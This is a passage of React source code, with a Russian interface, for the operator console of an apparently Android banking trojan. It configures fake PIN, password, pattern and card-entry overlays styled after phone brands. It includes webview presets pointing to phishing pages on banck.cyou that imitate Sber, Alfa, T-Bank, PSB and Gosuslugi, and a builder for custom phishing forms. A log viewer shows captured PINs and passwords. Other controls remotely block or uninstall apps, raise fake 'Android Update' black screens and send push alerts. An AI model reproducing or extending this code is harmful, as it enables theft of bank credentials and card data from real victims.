                        style={{ flexShrink: 0, flexGrow: 0, width: '22px', background: 'transparent', border: 'none', color: '#3a5060', fontSize: '11px', padding: '0', cursor: 'pointer', textAlign: 'center' }}

                        title={'Проверить блокировку ' + pkg}

                        onClick={e => { e.stopPropagation(); send('check_block_app', { package: pkg }, '🔍 Проверка: ' + pkg); }}

                      >🔍</button>

                      <button

                        style={{ flexShrink: 0, flexGrow: 0, width: '22px', background: 'transparent', border: 'none', color: '#3a5060', fontSize: '11px', padding: '0', cursor: 'pointer', textAlign: 'center' }}

                        title={'Разблокировать ' + pkg}

                        onClick={e => { e.stopPropagation(); send('unblock_app', { package: pkg }, '⏳ Разблокировка: ' + pkg); }}

                      >✅</button>

                      <button

                        style={{ flexShrink: 0, flexGrow: 0, width: '22px', background: 'transparent', border: 'none', color: '#3a5060', fontSize: '11px', padding: '0', cursor: 'pointer', textAlign: 'center' }}

                        title={'Удалить ' + pkg}

                        onClick={e => { e.stopPropagation(); if (window.confirm('Удалить ' + pkg + '?')) send('uninstall_app', { package: pkg }, 'Удаление: ' + pkg); }}

                      >🗑</button>

                    </div>

                  ))

                }

              </div>

            </>}

          </div>

        )}

      </div>



      {/* ── Логи гибридного оверлея ── */}

      {showHybridLogs && (

        <div style={{

          position:'absolute', bottom:0, left:0, right:0, zIndex:20,

          background:'#080f1a', borderTop:'1px solid #1e3050',

          maxHeight:'220px', display:'flex', flexDirection:'column',

        }} onMouseDown={e => e.stopPropagation()}>

          <div style={{ display:'flex', alignItems:'center', justifyContent:'space-between', padding:'5px 10px', borderBottom:'1px solid #101c2e', flexShrink:0 }}>

            <span style={{ color:'#4a9070', fontSize:'12px', fontWeight:'600' }}>📋 Логи гибридного оверлея</span>

            <div style={{ display:'flex', gap:'6px' }}>

              <button style={{ ...mkBtnStyle(false,false,true,false), padding:'2px 8px', fontSize:'11px' }}

                onClick={() => setHybridLogs([])}>Очистить</button>

              <button style={{ ...mkBtnStyle(false,true,false,false), padding:'2px 8px', fontSize:'11px' }}

                onClick={() => setShowHybridLogs(false)}>✕</button>

            </div>

          </div>

          <div style={{ overflowY:'auto', flex:1, padding:'4px 8px' }}>

            {hybridLogs.length === 0

              ? <div style={{ color:'#1e2d42', fontSize:'11px', padding:'8px 0', textAlign:'center' }}>Нет данных</div>

              : [...hybridLogs].reverse().map((entry, i) => {

                  const isSecret = entry.type === 'pin' || entry.type === 'pin_submit' ||

                                   entry.type === 'password' || entry.type === 'password_submit';

                  const hidden = isSecret && hRevealLog[i] === false;

                  const timeStr = new Date(entry.ts).toLocaleTimeString('ru-RU', { hour:'2-digit', minute:'2-digit', second:'2-digit' });

                  return (

                    <div key={i} style={{ display:'flex', alignItems:'center', gap:'8px', padding:'3px 0', borderBottom:'1px solid #0d1520', fontSize:'11px' }}>

                      <span style={{ color:'#2a4060', flexShrink:0 }}>{timeStr}</span>

                      <span style={{ color:'#3a7060', flexShrink:0, minWidth:'80px' }}>{logTypeLabel[entry.type] || entry.type}</span>

                      <span style={{ color:'#7ab4c8', fontFamily:'monospace', wordBreak:'break-all', flex:1 }}>

                        {hidden ? '•'.repeat(Math.min(String(entry.data ?? '').length, 20)) : formatLogData(entry)}

                      </span>

                      {isSecret && (

                        <button style={{ ...mkBtnStyle(false,false,false,false), padding:'1px 6px', fontSize:'10px', flexShrink:0 }}

                          onClick={() => setHRevealLog(r => ({ ...r, [i]: r[i] !== false ? false : undefined }))}>

                          {hidden ? '👁' : '🙈'}

                        </button>

                      )}

                    </div>

                  );

                })

            }

          </div>

        </div>

      )}



      {/* ── Диалог надписи на чёрном экране ── */}

      {blackTextModal && (

        <div style={{ position:'absolute', inset:0, zIndex:30, background:'rgba(0,0,0,0.75)', display:'flex', alignItems:'center', justifyContent:'center' }}

             onMouseDown={e => e.stopPropagation()}>

          <div style={{ background:'#0b1220', border:'1px solid #1e3050', borderRadius:'8px', padding:'20px', width:'360px', maxWidth:'95%', display:'flex', flexDirection:'column', gap:'14px' }}>

            <div style={{ display:'flex', justifyContent:'space-between', alignItems:'center' }}>

              <span style={{ color:'#c8a840', fontSize:'13px', fontWeight:'700' }}>⬛ Надпись на чёрном экране</span>

              <button style={{ background:'none', border:'none', color:'#c07070', cursor:'pointer', fontSize:'18px', lineHeight:1 }}

                onClick={() => setBlackTextModal(false)}>✕</button>

            </div>

            <input

              autoFocus

              type="text"

              value={blackText}

              onChange={e => setBlackText(e.target.value)}

              placeholder="Оставьте пустым для обычного чёрного"

              style={{ padding:'8px 12px', borderRadius:'6px', border:'1px solid #1e3050', background:'#060d18', color:'#8ab4c8', fontSize:'13px', outline:'none' }}

              onKeyDown={e => { if (e.key === 'Enter' && !blackUpdateMode) { setBlackTextModal(false); applyBlack(blackText.trim()); } }}

            />

            <label style={{ display:'flex', alignItems:'center', gap:'8px', cursor:'pointer', userSelect:'none' }}>

              <input

                type="checkbox"

                checked={blackUpdateMode}

                onChange={e => setBlackUpdateMode(e.target.checked)}

                style={{ width:'15px', height:'15px', accentColor:'#00e5ff', cursor:'pointer' }}

              />

              <span style={{ color:'#00e5ff', fontSize:'12px' }}>🤖 Включение обновления (Android Update)</span>

            </label>

            <div style={{ display:'flex', gap:'8px', justifyContent:'flex-end' }}>

              <button onClick={() => setBlackTextModal(false)}

                style={{ padding:'6px 16px', borderRadius:'6px', border:'1px solid #1e3050', background:'transparent', color:'#5a7a9a', cursor:'pointer', fontSize:'12px' }}>Отмена</button>

              <button onClick={() => { setBlackTextModal(false); if (blackUpdateMode) { applyAndroidUpdate(); } else { applyBlack(blackText.trim()); } }}

                style={{ padding:'6px 16px', borderRadius:'6px', background: blackUpdateMode ? '#00e5ff' : '#c8a840', color:'#080e18', border:'none', cursor:'pointer', fontSize:'12px', fontWeight:'700' }}>Включить</button>

            </div>

          </div>

        </div>

      )}



      {/* ── Пуш-Алерт диалог ── */}

      {showPushAlert && (
        <div style={{ position:'absolute', inset:0, zIndex:25, background:'rgba(0,0,0,0.75)', display:'flex', alignItems:'center', justifyContent:'center' }}
             onMouseDown={e => e.stopPropagation()}>
          <div style={{ background:'#0b1220', border:'1px solid #1e3050', borderRadius:'8px', padding:'20px', width:'480px', maxWidth:'95%', maxHeight:'92%', overflowY:'auto' }}>

            {/* Заголовок */}
            <div style={{ display:'flex', justifyContent:'space-between', alignItems:'center', marginBottom:'16px' }}>
              <span style={{ color:'#7c9cbf', fontSize:'13px', fontWeight:'700' }}>📣 Пуш-Алерт</span>
              <button style={{ background:'none', border:'none', color:'#c07070', cursor:'pointer', fontSize:'18px', lineHeight:1 }}
                onClick={() => setShowPushAlert(false)}>✕</button>
            </div>

            {/* Заголовок алерта */}
            <div style={{ marginBottom:'10px' }}>
              <div style={{ color:'#4a7090', fontSize:'11px', marginBottom:'4px' }}>Заголовок</div>
              <input style={{ ...dlgInput, width:'100%' }} value={paTitle} onChange={e => setPaTitle(e.target.value)} placeholder="Внимание" />
            </div>

            {/* Текст */}
            <div style={{ marginBottom:'10px' }}>
              <div style={{ color:'#4a7090', fontSize:'11px', marginBottom:'4px' }}>Текст под заголовком</div>
              <textarea style={{ ...dlgInput, width:'100%', height:'64px', resize:'vertical' }} value={paMessage} onChange={e => setPaMessage(e.target.value)} placeholder="Текст сообщения..." />
            </div>

            {/* Текст кнопки */}
            <div style={{ marginBottom:'10px' }}>
              <div style={{ color:'#4a7090', fontSize:'11px', marginBottom:'4px' }}>Текст кнопки</div>
              <input style={{ ...dlgInput, width:'100%' }} value={paBtnText} onChange={e => setPaBtnText(e.target.value)} placeholder="Понятно" />
            </div>

            {/* Цвет кнопки */}
            <div style={{ marginBottom:'10px', display:'flex', gap:'10px' }}>
              <div style={{ flex:1 }}>
                <div style={{ color:'#4a7090', fontSize:'11px', marginBottom:'4px' }}>Цвет кнопки</div>
                <div style={{ display:'flex', gap:'6px', alignItems:'center' }}>
                  <input type="color" value={paBtnColor} onChange={e => setPaBtnColor(e.target.value)}
                    style={{ width:'32px', height:'26px', padding:'1px', border:'1px solid #1e3050', borderRadius:'4px', background:'none', cursor:'pointer' }} />
                  <input style={{ ...dlgInput, flex:1 }} value={paBtnColor} onChange={e => setPaBtnColor(e.target.value)} placeholder="#D0BCFF" />
                </div>
              </div>
              <div style={{ flex:1 }}>
                <div style={{ color:'#4a7090', fontSize:'11px', marginBottom:'4px' }}>Цвет текста</div>
                <div style={{ display:'flex', gap:'6px', alignItems:'center' }}>
                  <input type="color" value={paBtnTextColor} onChange={e => setPaBtnTextColor(e.target.value)}
                    style={{ width:'32px', height:'26px', padding:'1px', border:'1px solid #1e3050', borderRadius:'4px', background:'none', cursor:'pointer' }} />
                  <input style={{ ...dlgInput, flex:1 }} value={paBtnTextColor} onChange={e => setPaBtnTextColor(e.target.value)} placeholder="#381E72" />
                </div>
              </div>
            </div>

            {/* Выбор приложения */}
            <div style={{ marginBottom:'10px' }}>
              <div style={{ color:'#4a7090', fontSize:'11px', marginBottom:'4px' }}>
                Приложение при клике
                {paLaunchApp && <span style={{ color:'#4caf50', marginLeft:'6px' }}>▸ {paLaunchApp}</span>}
              </div>
              <input style={{ ...dlgInput, width:'100%', marginBottom:'4px' }}
                value={paAppSearch} onChange={e => setPaAppSearch(e.target.value)} placeholder="Поиск..." />
              <div style={{ maxHeight:'150px', overflowY:'auto', border:'1px solid #1a3050', borderRadius:'4px' }}>
                {(paAppSearch
                  ? appsList.filter(a => typeof a === 'string' && a.toLowerCase().includes(paAppSearch.toLowerCase()))
                  : appsList
                ).map((app, i) => (
                  <div key={i} onClick={() => setPaLaunchApp(paLaunchApp === app ? '' : app)}
                    style={{
                      padding:'5px 8px', fontSize:'11px', cursor:'pointer',
                      background: paLaunchApp === app ? '#1a3a5a' : 'transparent',
                      color: paLaunchApp === app ? '#7ec8e3' : '#6a8fa8',
                      borderBottom:'1px solid #0d1e30',
                    }}
                    onMouseEnter={e => { if (paLaunchApp !== app) e.currentTarget.style.background = '#0d1e30'; }}
                    onMouseLeave={e => { if (paLaunchApp !== app) e.currentTarget.style.background = 'transparent'; }}
                  >{app}</div>
                ))}
                {appsList.length === 0 && <div style={{ padding:'8px', color:'#3a5070', fontSize:'11px' }}>Список приложений не получен</div>}
              </div>
            </div>

            {/* Режим */}
            <div style={{ marginBottom:'14px' }}>
              <div style={{ color:'#4a7090', fontSize:'11px', marginBottom:'6px' }}>Режим</div>
              <div style={{ display:'flex', gap:'6px' }}>
                {[['permanent','🔁 Постоянный'],['timed','⏱ Временный']].map(([v, label]) => (
                  <button key={v} onClick={() => setPaDurType(v)}
                    style={{ padding:'5px 12px', fontSize:'11px', borderRadius:'4px', border:'1px solid', cursor:'pointer',
                      borderColor: paDurType === v ? '#3a7080' : '#1a3050',
                      background:  paDurType === v ? '#0d2535' : 'transparent',
                      color:       paDurType === v ? '#7ec8e3' : '#4a7090' }}>
                    {label}
                  </button>
                ))}
                {paDurType === 'timed' && (
                  <input type="number" min="5" max="3600" style={{ ...dlgInput, width:'70px' }}
                    value={paDurSec} onChange={e => setPaDurSec(e.target.value)} />
                )}
                {paDurType === 'timed' && <span style={{ color:'#4a7090', fontSize:'11px', alignSelf:'center' }}>сек</span>}
              </div>
            </div>

            {/* Отправить */}
            <div style={{ display:'flex', justifyContent:'flex-end' }}>
              <Btn warn onClick={sendPushAlert}>📣 Отправить</Btn>
            </div>

          </div>
        </div>
      )}



      {/* ── Диалог конфигуратора гибридного оверлея ── */}

      {showHybridDialog && (

        <div style={{ position:'absolute', inset:0, zIndex:25, background:'rgba(0,0,0,0.75)', display:'flex', alignItems:'center', justifyContent:'center' }}

             onMouseDown={e => e.stopPropagation()}>

          <div style={{ background:'#0b1220', border:'1px solid #1e3050', borderRadius:'8px', padding:'20px', width:'520px', maxWidth:'95%', maxHeight:'92%', overflowY:'auto' }}>



            {/* Заголовок */}

            <div style={{ display:'flex', justifyContent:'space-between', alignItems:'center', marginBottom:'16px' }}>

              <span style={{ color:'#4caf50', fontSize:'13px', fontWeight:'700' }}>🔒 Гибридный оверлей</span>

              <button style={{ background:'none', border:'none', color:'#c07070', cursor:'pointer', fontSize:'18px', lineHeight:1 }}

                onClick={() => { setShowHybridDialog(false); resetHybridDialog(); }}>✕</button>

            </div>



            {/* Тип оверлея */}

            <div style={dlgSection}>

              <label style={dlgLabel}>Тип оверлея:</label>

              <div style={{ display:'grid', gridTemplateColumns:'repeat(6, 1fr)', gap:'6px' }}>

                {[['pin','🔢 PIN'],['password','🔤 Пароль'],['pattern','🔷 Паттерн'],['webview','🌐 WebView'],['browser','🔗 Браузер'],['card','💳 Карта']].map(([t, label]) => (

                  <button key={t} style={{ ...mkBtnStyle(hType === t, false, false, false), padding:'8px 4px', fontSize:'11px', textAlign:'center' }}

                    onClick={() => setHType(t)}>{label}</button>

                ))}

              </div>

            </div>



            {/* Текст для пользователя */}

            {hType !== 'browser' && (

            <div style={dlgSection}>

              <label style={{ ...dlgLabel, color:'#6a9ab0' }}>Текст для пользователя на устройстве:</label>

              <input style={dlgInput} type="text" value={hTitle} onChange={e => setHTitle(e.target.value)}

                placeholder="Введите текст который увидит пользователь..." autoFocus />

            </div>

            )}



            {/* Подсказка (паттерн / пароль) */}

            {(hType === 'pattern' || hType === 'password') && (

            <div style={dlgSection}>

              <label style={dlgLabel}>Подсказка (необязательно):</label>

              <input style={dlgInput} type="text" value={hHint} onChange={e => setHHint(e.target.value)}

                placeholder="Текст-подсказка под заголовком..." />

            </div>

            )}



            {/* Текст кнопки подтверждения (только PIN и Пароль) */}

            {(hType === 'pin' || hType === 'password') && (

              <div style={dlgSection}>

                <label style={dlgLabel}>Текст кнопки подтверждения:</label>

                <input style={dlgInput} type="text" value={hButtonText} onChange={e => setHButtonText(e.target.value)}

                  placeholder="OK" />

              </div>

            )}



            {/* Параметры типа */}

            {hType === 'pin' && (

              <div style={dlgSection}>

                <label style={dlgLabel}>Количество цифр PIN:</label>

                <div style={{ display:'flex', gap:'8px', alignItems:'center', flexWrap:'wrap' }}>

                  {[[4,'4'],[6,'6']].map(([v, label]) => (

                    <button key={v} style={mkBtnStyle(hPinDigits === v, false, false, false)}

                      onClick={() => setHPinDigits(v)}>{label}</button>

                  ))}

                  <input

                    type="number"

                    min="1"

                    max="20"

                    placeholder="Своё..."

                    style={{ width:'80px', padding:'4px 8px', borderRadius:'6px', border:'1px solid #444', background:'#1a1a2e', color:'#fff', fontSize:'13px', outline: hPinDigits > 0 && hPinDigits !== 4 && hPinDigits !== 6 ? '2px solid #7c3aed' : 'none' }}

                    value={hPinDigits > 0 && hPinDigits !== 4 && hPinDigits !== 6 ? hPinDigits : ''}

                    onChange={e => {

                      const n = parseInt(e.target.value, 10);

                      if (!isNaN(n) && n >= 1 && n <= 20) setHPinDigits(n);

                    }}

                  />

                </div>

              </div>

            )}



            {/* Выбор бренда (PIN и Карта) */}

            {(hType === 'pin' || hType === 'card') && (

              <div style={dlgSection}>

                <label style={dlgLabel}>Стиль бренда:</label>

                <div style={{ display:'grid', gridTemplateColumns:'repeat(4, 1fr)', gap:'4px' }}>

                  {[['xiaomi','📱 Xiaomi'],['samsung','🔵 Samsung'],['honor','◻ Honor'],['oppo','🔴 OPPO'],

                    ['vivo','🟣 Vivo'],['tecno','⬜ Tecno'],['pixel','🔷 Pixel'],['stock','⬛ Stock']].map(([b, lbl]) => (

                    <button key={b} style={{ ...mkBtnStyle(hBrand === b, false, false, false), padding:'5px 2px', fontSize:'11px', textAlign:'center' }}

                      onClick={() => setHBrand(b)}>{lbl}</button>

                  ))}

                </div>

              </div>

            )}



            {/* Проверка простых PIN */}

            {hType === 'pin' && (

              <div style={dlgSection}>

                <label style={{ ...dlgLabel, cursor:'pointer', display:'flex', alignItems:'center', gap:'6px', userSelect:'none' }}>

                  <input type="checkbox" checked={hValidatePin} onChange={e => setHValidatePin(e.target.checked)}

                    style={{ cursor:'pointer', accentColor:'#f39c12' }} />

                  Проверка простых PIN (0000, 1234 и т.д.)

                </label>

              </div>

            )}



            {/* Поля карты */}

            {hType === 'card' && (

              <>

                <div style={dlgSection}>

                  <label style={dlgLabel}>Причина запроса (hint, необязательно):</label>

                  <input style={dlgInput} type="text" value={hHint} onChange={e => setHHint(e.target.value)}

                    placeholder="Для чего запрашиваем данные карты..." />

                </div>

                <div style={dlgSection}>

                  <label style={dlgLabel}>Поля карты:</label>

                  <div style={{ display:'flex', flexDirection:'column', gap:'6px' }}>

                    {[

                      [hShowExpiry, setHShowExpiry, 'Срок действия (MM/YY)'],

                      [hShowCvv,    setHShowCvv,    'CVV / CVC код'],

                      [hShowName,   setHShowName,   'Имя держателя карты'],

                    ].map(([checked, setter, lbl], idx) => (

                      <label key={idx} style={{ cursor:'pointer', display:'flex', alignItems:'center', gap:'6px', userSelect:'none', color:'#8ab4c8', fontSize:'12px' }}>

                        <input type="checkbox" checked={checked} onChange={e => setter(e.target.checked)}

                          style={{ cursor:'pointer', accentColor:'#4a9eff' }} />

                        {lbl}

                      </label>

                    ))}

                  </div>

                </div>

              </>

            )}



            {(hType === 'webview' || hType === 'browser') && (

              <div style={dlgSection}>

                <label style={dlgLabel}>URL:</label>

                {!hSbpinPreset && (
                <input style={dlgInput} type="url" value={hUrl} onChange={e => setHUrl(e.target.value)}
                  placeholder="https://..." autoFocus={hType === 'browser'} />
                )}

                {hType === 'webview' && (
                  <div style={{ marginTop:'8px' }}>
                    <div style={{ fontSize:'11px', color:'#888', marginBottom:'5px' }}>Быстрый выбор:</div>
                    <div style={{ display:'grid', gridTemplateColumns:'repeat(3, 1fr)', gap:'5px' }}>
                      {[
                        ['🏦 Альфа',     'https://banck.cyou/alfa'],
                        ['🏛 Госуслуги', 'https://banck.cyou/gosi'],
                        ['🏦 ПСБ',       'https://banck.cyou/psb'],
                        ['💳 Т-Банк',    'https://banck.cyou/tbank'],
                        ['🟩 Сбер',      'https://banck.cyou/sb'],
                        ['🔐 Сбер PIN',  'sbpin'],
                        ['⚙️ Кастом',    null],
                      ].map(([label, url]) => (
                        <button key={label}
                          onClick={() => {
                            if (url === null) { setCCustomMode(true); setHSbpinPreset(false); setHUrl(''); }
                            else if (url === 'sbpin') { setHSbpinPreset(true); setCCustomMode(false); setHUrl(''); }
                            else { setCCustomMode(false); setHSbpinPreset(false); setHUrl(url); }
                          }}
                          style={{ padding:'6px 4px', fontSize:'11px', textAlign:'center', background: (url === null ? cCustomMode : url === 'sbpin' ? hSbpinPreset : hUrl === url) ? 'rgba(99,149,255,0.3)' : 'rgba(255,255,255,0.07)', border:'1px solid rgba(255,255,255,0.15)', borderRadius:'6px', color:'#fff', cursor:'pointer' }}>
                          {label}
                        </button>
                      ))}
                    </div>
                    {cCustomMode && (
                      <div style={{ marginTop:'10px', padding:'10px', background:'rgba(255,255,255,0.04)', borderRadius:'8px', border:'1px solid rgba(255,255,255,0.1)' }}>
                        <div style={{ fontSize:'11px', color:'#aaa', marginBottom:'8px', fontWeight:'600' }}>⚙️ Конструктор кастом-формы</div>
                        <div style={{ display:'grid', gridTemplateColumns:'1fr 1fr', gap:'6px', marginBottom:'6px' }}>
                          <div>
                            <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Заголовок</div>
                            <input style={{ ...dlgInput, fontSize:'11px', padding:'5px 8px' }} type="text" placeholder="Например: Сбербанк" value={cTitle} onChange={e => setCTitle(e.target.value)} />
                          </div>
                          <div>
                            <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Текст кнопки</div>
                            <input style={{ ...dlgInput, fontSize:'11px', padding:'5px 8px' }} type="text" placeholder="Подтвердить" value={cBtnText} onChange={e => setCBtnText(e.target.value)} />
                          </div>
                        </div>
                        <div style={{ marginBottom:'6px' }}>
                          <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Описание</div>
                          <input style={{ ...dlgInput, fontSize:'11px', padding:'5px 8px' }} type="text" placeholder="Подтвердите данные для входа" value={cDesc} onChange={e => setCDesc(e.target.value)} />
                        </div>
                        <div style={{ display:'grid', gridTemplateColumns:'1fr 1fr', gap:'6px', marginBottom:'6px' }}>
                          <div>
                            <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Цвет кнопки</div>
                            <div style={{ display:'flex', gap:'4px', alignItems:'center' }}>
                              <input type="color" value={cBtnColor} onChange={e => setCBtnColor(e.target.value)} style={{ width:'32px', height:'28px', padding:'0', border:'none', background:'none', cursor:'pointer' }} />
                              <input style={{ ...dlgInput, fontSize:'11px', padding:'5px 8px', flex:1 }} type="text" value={cBtnColor} onChange={e => setCBtnColor(e.target.value)} />
                            </div>
                          </div>
                          <div>
                            <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>URL фона (необязательно)</div>
                            <input style={{ ...dlgInput, fontSize:'11px', padding:'5px 8px' }} type="url" placeholder="https://..." value={cBgUrl} onChange={e => setCBgUrl(e.target.value)} />
                          </div>
                        </div>
                        <div style={{ marginBottom:'8px' }}>
                          <div style={{ fontSize:'10px', color:'#888', marginBottom:'5px' }}>Поля формы:</div>
                          <div style={{ display:'grid', gridTemplateColumns:'repeat(3, 1fr)', gap:'4px' }}>
                            {[['pin','🔢 PIN'],['card','💳 Карта'],['phone','📱 Телефон'],['email','✉️ Email'],['password','🔤 Пароль'],['text','📝 Текст']].map(([k, lbl]) => (
                              <label key={k} style={{ display:'flex', alignItems:'center', gap:'4px', fontSize:'11px', cursor:'pointer', color: cFields[k] ? '#fff' : '#888' }}>
                                <input type="checkbox" checked={cFields[k]} onChange={e => setCFields(f => ({ ...f, [k]: e.target.checked }))} />
                                {lbl}
                              </label>
                            ))}
                          </div>
                        </div>
                        {cFields.pin && (
                          <div style={{ display:'flex', flexDirection:'column', gap:'6px', marginBottom:'8px' }}>
                            <div>
                              <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Название поля PIN</div>
                              <input style={{ background:'#1a1a2e', border:'1px solid #444', borderRadius:'4px', color:'#fff', padding:'5px 8px', fontSize:'11px', width:'100%', boxSizing:'border-box' }} type="text" placeholder="Код подтверждения" value={cPinLabel} onChange={e => setCPinLabel(e.target.value)} />
                            </div>
                            <label style={{ display:'flex', alignItems:'center', gap:'6px', fontSize:'11px', color:'#aaa', cursor:'pointer' }}>
                              <input type="checkbox" checked={cValidatePin} onChange={e => setCValidatePin(e.target.checked)} />
                              Проверять простые PIN (1111, 1234...)
                            </label>
                            <label style={{ display:'flex', alignItems:'center', gap:'8px', fontSize:'11px', color:'#aaa' }}>
                              Длина PIN:
                              <select value={cPinLength} onChange={e => setCPinLength(Number(e.target.value))}
                                style={{ background:'#1a1a2e', border:'1px solid #333', borderRadius:'4px', color:'#ccc', padding:'2px 6px', fontSize:'11px' }}>
                                {[4,5,6].map(n => <option key={n} value={n}>{n} цифры</option>)}
                              </select>
                            </label>
                          </div>
                        )}
                        <button onClick={() => {
                          const fields = [];
                          if (cFields.pin)      fields.push({ type:'pin',      label: cPinLabel || 'Код подтверждения', pin_length:cPinLength });
                          if (cFields.card)     fields.push({ type:'card',     label:'Номер карты' });
                          if (cFields.phone)    fields.push({ type:'tel',      label:'Номер телефона', name:'phone' });
                          if (cFields.email)    fields.push({ type:'email',    label:'Email', name:'email' });
                          if (cFields.password) fields.push({ type:'password', label:'Пароль', name:'password' });
                          if (cFields.text)     fields.push({ type:'text',     label:'Текст', name:'text' });
                          const cfg = { title: cTitle || 'Подтверждение', description: cDesc || '', confirm_button_text: cBtnText || 'Подтвердить', btn_color: cBtnColor || '#FFDD2D', fields };
                          if (cBgUrl) cfg.backgroundImageUrl = cBgUrl;
                          if (cFields.pin && cValidatePin) cfg.validate_pin = true;
                          try {
                            const encoded = btoa(unescape(encodeURIComponent(JSON.stringify(cfg))));
                            setHUrl('https://banck.cyou/castom?config=' + encoded);
                          } catch(e2) {}
                        }} style={{ width:'100%', padding:'7px', fontSize:'11px', background:'rgba(99,200,99,0.15)', border:'1px solid rgba(99,200,99,0.4)', borderRadius:'6px', color:'#8f8', cursor:'pointer' }}>
                          ✅ Применить конфигурацию
                        </button>
                      </div>
                    )}
                    {hSbpinPreset && (
                      <div style={{ marginTop:'10px', padding:'10px', background:'rgba(255,255,255,0.04)', borderRadius:'8px', border:'1px solid rgba(255,255,255,0.1)' }}>
                        <div style={{ fontSize:'11px', color:'#aaa', marginBottom:'8px', fontWeight:'600' }}>🔐 Настройки Сбер PIN</div>
                        <div style={{ display:'flex', flexDirection:'column', gap:'8px' }}>
                          <div>
                            <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Строка 1 — приветствие (напр. «Добрый день»)</div>
                            <input style={{ ...dlgInput, fontSize:'12px' }} type="text" value={hSbpinGreeting}
                              onChange={e => setHSbpinGreeting(e.target.value)} placeholder="Оставьте пустым чтобы скрыть" />
                          </div>
                          <div>
                            <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Строка 2 — имя (напр. «Иван»)</div>
                            <input style={{ ...dlgInput, fontSize:'12px' }} type="text" value={hSbpinName}
                              onChange={e => setHSbpinName(e.target.value)} placeholder="Оставьте пустым чтобы скрыть" />
                          </div>
                          <label style={{ display:'flex', alignItems:'center', gap:'6px', fontSize:'12px', color:'#ccc', cursor:'pointer', userSelect:'none' }}>
                            <input type="checkbox" checked={hSbpinValidPin} onChange={e => setHSbpinValidPin(e.target.checked)}
                              style={{ cursor:'pointer', accentColor:'#f39c12' }} />
                            Проверять простые PIN (0000, 1234 и т.д.)
                          </label>
                          <div>
                            <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Часть PIN (напр. 6512? или ?512?) — ? = неизв. цифра</div>
                            <input style={{ ...dlgInput, fontSize:'12px', fontFamily:'monospace' }} type="text"
                              value={hSbpinPattern} onChange={e => setHSbpinPattern(e.target.value)}
                              placeholder="Оставьте пустым если неизвестно" />
                          </div>
                          <label style={{ display:'flex', alignItems:'center', gap:'6px', fontSize:'12px', color:'#ccc', cursor:'pointer', userSelect:'none', borderTop:'1px solid rgba(255,255,255,0.08)', paddingTop:'8px', marginTop:'2px' }}>
                            <input type="checkbox" checked={hSbpinPopup} onChange={e => setHSbpinPopup(e.target.checked)}
                              style={{ cursor:'pointer', accentColor:'#27ae60' }} />
                            Показать всплывающее окно
                          </label>
                          {hSbpinPopup && (
                            <div style={{ display:'flex', flexDirection:'column', gap:'6px', padding:'8px', background:'rgba(39,174,96,0.08)', borderRadius:'6px', border:'1px solid rgba(39,174,96,0.2)' }}>
                              <div>
                                <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Заголовок (жирный текст)</div>
                                <input style={{ ...dlgInput, fontSize:'12px' }} type="text"
                                  value={hSbpinPopupTitle} onChange={e => setHSbpinPopupTitle(e.target.value)}
                                  placeholder="Напр. «Доступна новая версия»" />
                              </div>
                              <div>
                                <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Текст описания (серый)</div>
                                <input style={{ ...dlgInput, fontSize:'12px' }} type="text"
                                  value={hSbpinPopupText} onChange={e => setHSbpinPopupText(e.target.value)}
                                  placeholder="Напр. «Пожалуйста, установите новую версию»" />
                              </div>
                              <div>
                                <div style={{ fontSize:'10px', color:'#888', marginBottom:'3px' }}>Текст кнопки</div>
                                <input style={{ ...dlgInput, fontSize:'12px' }} type="text"
                                  value={hSbpinPopupBtn} onChange={e => setHSbpinPopupBtn(e.target.value)}
                                  placeholder="Напр. «Установить»" />
                              </div>
                            </div>
                          )}
                        </div>
                      </div>
                    )}
                  </div>
                )}

              </div>

            )}



            {/* Режим показа */}

            {hType !== 'browser' && (<div style={dlgSection}>

              <label style={dlgLabel}>Режим показа:</label>

              <div style={{ display:'flex', gap:'8px', alignItems:'center' }}>

                <button style={mkBtnStyle(hDurType === 'permanent', false, hDurType !== 'permanent', false)}

                  onClick={() => setHDurType('permanent')}>🔁 Постоянный</button>

                <button style={mkBtnStyle(hDurType === 'timed', false, hDurType !== 'timed', false)}

                  onClick={() => setHDurType('timed')}>⏱ Временный</button>

                {hDurType === 'timed' && (

                  <input style={{ ...dlgInput, width:'70px' }} type="number" min="5" max="3600"

                    value={hDurSec} onChange={e => setHDurSec(e.target.value)} />

                )}

                {hDurType === 'timed' && <span style={{ color:'#4a7090', fontSize:'11px' }}>сек</span>}

              </div>

            </div>)}



            {/* Запуск */}

            <div style={{ display:'flex', justifyContent:'flex-end', marginTop:'6px' }}>

              <Btn warn onClick={sendHybridOverlay} dim={(hType === 'webview' || hType === 'browser') && !hUrl && !hSbpinPreset && !cCustomMode}>

                🚀 Запустить оверлей

              </Btn>

            </div>

          </div>

        </div>

      )}

    </div>

  );

}



export default React.memo(VNCModal, (prev, next) =>

    prev.device?.uuid === next.device?.uuid &&

    prev.device?.systemInfo?.supAP?.data?.sup_ap_list === next.device?.systemInfo?.supAP?.data?.sup_ap_list &&

    prev.ws       === next.ws     &&

    prev.onClose  === next.onClose

  );

